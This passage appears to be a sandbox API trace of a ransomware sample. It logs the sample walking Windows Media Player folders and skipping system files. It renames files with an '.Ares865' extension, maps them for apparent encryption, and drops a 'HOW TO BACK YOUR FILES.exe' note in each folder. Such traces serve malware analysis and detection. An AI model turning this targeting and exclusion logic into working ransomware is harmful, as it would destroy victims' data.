0x2f00d8 [0122.399] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.400] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.400] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.400] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13b0, lpName=0x0) returned 0x170 [0122.404] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13b0) returned 0x190000 [0122.405] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.407] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.407] CloseHandle (hObject=0x170) returned 1 [0122.407] CloseHandle (hObject=0x118) returned 1 [0122.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.408] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52200ac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52200ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0122.408] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0122.408] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e59891, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e59891, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1be0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RenderingControl.xml.Ares865", cAlternateFileName="")) returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2=".") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="..") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="windows") returned -1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="bootmgr") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="temp") returned -1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="pagefile.sys") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="boot") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="ids.txt") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="ntuser.dat") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="perflogs") returned 1 [0122.408] lstrcmpiW (lpString1="RenderingControl.xml.Ares865", lpString2="MSBuild") returned 1 [0122.408] lstrlenW (lpString="RenderingControl.xml.Ares865") returned 28 [0122.408] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png") returned 69 [0122.408] lstrcpyW (in: lpString1=0x2cce476, lpString2="RenderingControl.xml.Ares865" | out: lpString1="RenderingControl.xml.Ares865") returned="RenderingControl.xml.Ares865" [0122.408] lstrlenW (lpString="RenderingControl.xml.Ares865") returned 28 [0122.408] lstrlenW (lpString="Ares865") returned 7 [0122.408] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0122.408] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e59891, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e59891, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1be0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RenderingControl.xml.Ares865", cAlternateFileName="")) returned 0 [0122.408] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.408] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0122.409] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player\\Icons", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Icons") returned="C:\\Program Files (x86)\\Windows Media Player\\Icons" [0122.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30b0 | out: hHeap=0x2b0000) returned 1 [0122.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0122.409] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Icons") returned 49 [0122.409] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Media Player\\Icons" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Icons") returned="C:\\Program Files (x86)\\Windows Media Player\\Icons" [0122.409] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.409] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Icons\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows media player\\icons\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.410] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.411] GetLastError () returned 0x0 [0122.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.411] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.411] CloseHandle (hObject=0x120) returned 1 [0122.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.411] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.411] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Icons\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.411] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.411] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.411] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.411] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.411] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.411] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.411] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.411] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.411] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0122.412] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.412] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0122.412] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\en-US") returned="C:\\Program Files (x86)\\Windows Media Player\\en-US" [0122.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3040 | out: hHeap=0x2b0000) returned 1 [0122.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0122.412] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US") returned 49 [0122.412] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Media Player\\en-US" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\en-US") returned="C:\\Program Files (x86)\\Windows Media Player\\en-US" [0122.412] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.412] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.413] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.413] GetLastError () returned 0x0 [0122.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.413] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.413] CloseHandle (hObject=0x120) returned 1 [0122.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.413] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.413] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.413] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.413] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.413] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.414] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.414] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.414] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.414] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.414] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.414] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5224cd80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0122.414] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0122.414] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpvis.dll.mui", cAlternateFileName="")) returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="aoldtz.exe") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2=".") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="..") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="windows") returned -1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="bootmgr") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="temp") returned -1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="pagefile.sys") returned -1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="boot") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="ids.txt") returned 1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="ntuser.dat") returned -1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="perflogs") returned -1 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2="MSBuild") returned -1 [0122.414] lstrlenW (lpString="mpvis.dll.mui") returned 13 [0122.414] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\*") returned 51 [0122.414] lstrcpyW (in: lpString1=0x2cce464, lpString2="mpvis.dll.mui" | out: lpString1="mpvis.dll.mui") returned="mpvis.dll.mui" [0122.414] lstrlenW (lpString="mpvis.dll.mui") returned 13 [0122.414] lstrlenW (lpString="Ares865") returned 7 [0122.414] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0122.414] lstrlenW (lpString=".dll") returned 4 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2=".dll") returned 1 [0122.414] lstrlenW (lpString=".lnk") returned 4 [0122.414] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2=".lnk") returned 1 [0122.415] lstrlenW (lpString=".ini") returned 4 [0122.415] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2=".ini") returned 1 [0122.415] lstrlenW (lpString=".sys") returned 4 [0122.415] lstrcmpiW (lpString1="mpvis.dll.mui", lpString2=".sys") returned 1 [0122.415] lstrlenW (lpString="mpvis.dll.mui") returned 13 [0122.415] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui.Ares865") returned 71 [0122.415] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\mpvis.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\mpvis.dll.mui.ares865"), dwFlags=0x1) returned 1 [0122.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\mpvis.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0122.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.425] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.426] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.426] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.426] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x170 [0122.428] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0122.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.436] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.437] CloseHandle (hObject=0x170) returned 1 [0122.437] CloseHandle (hObject=0x118) returned 1 [0122.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.437] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup_wm.exe.mui", cAlternateFileName="")) returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="aoldtz.exe") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2=".") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="..") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="windows") returned -1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="bootmgr") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="temp") returned -1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="pagefile.sys") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="boot") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="ids.txt") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="ntuser.dat") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="perflogs") returned 1 [0122.437] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2="MSBuild") returned 1 [0122.437] lstrlenW (lpString="setup_wm.exe.mui") returned 16 [0122.437] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui") returned 63 [0122.437] lstrcpyW (in: lpString1=0x2cce464, lpString2="setup_wm.exe.mui" | out: lpString1="setup_wm.exe.mui") returned="setup_wm.exe.mui" [0122.437] lstrlenW (lpString="setup_wm.exe.mui") returned 16 [0122.437] lstrlenW (lpString="Ares865") returned 7 [0122.437] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0122.438] lstrlenW (lpString=".dll") returned 4 [0122.438] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2=".dll") returned 1 [0122.438] lstrlenW (lpString=".lnk") returned 4 [0122.438] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2=".lnk") returned 1 [0122.438] lstrlenW (lpString=".ini") returned 4 [0122.438] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2=".ini") returned 1 [0122.438] lstrlenW (lpString=".sys") returned 4 [0122.438] lstrcmpiW (lpString1="setup_wm.exe.mui", lpString2=".sys") returned 1 [0122.438] lstrlenW (lpString="setup_wm.exe.mui") returned 16 [0122.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui.Ares865") returned 74 [0122.438] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\setup_wm.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\setup_wm.exe.mui.ares865"), dwFlags=0x1) returned 1 [0122.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\setup_wm.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56320) returned 1 [0122.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.441] 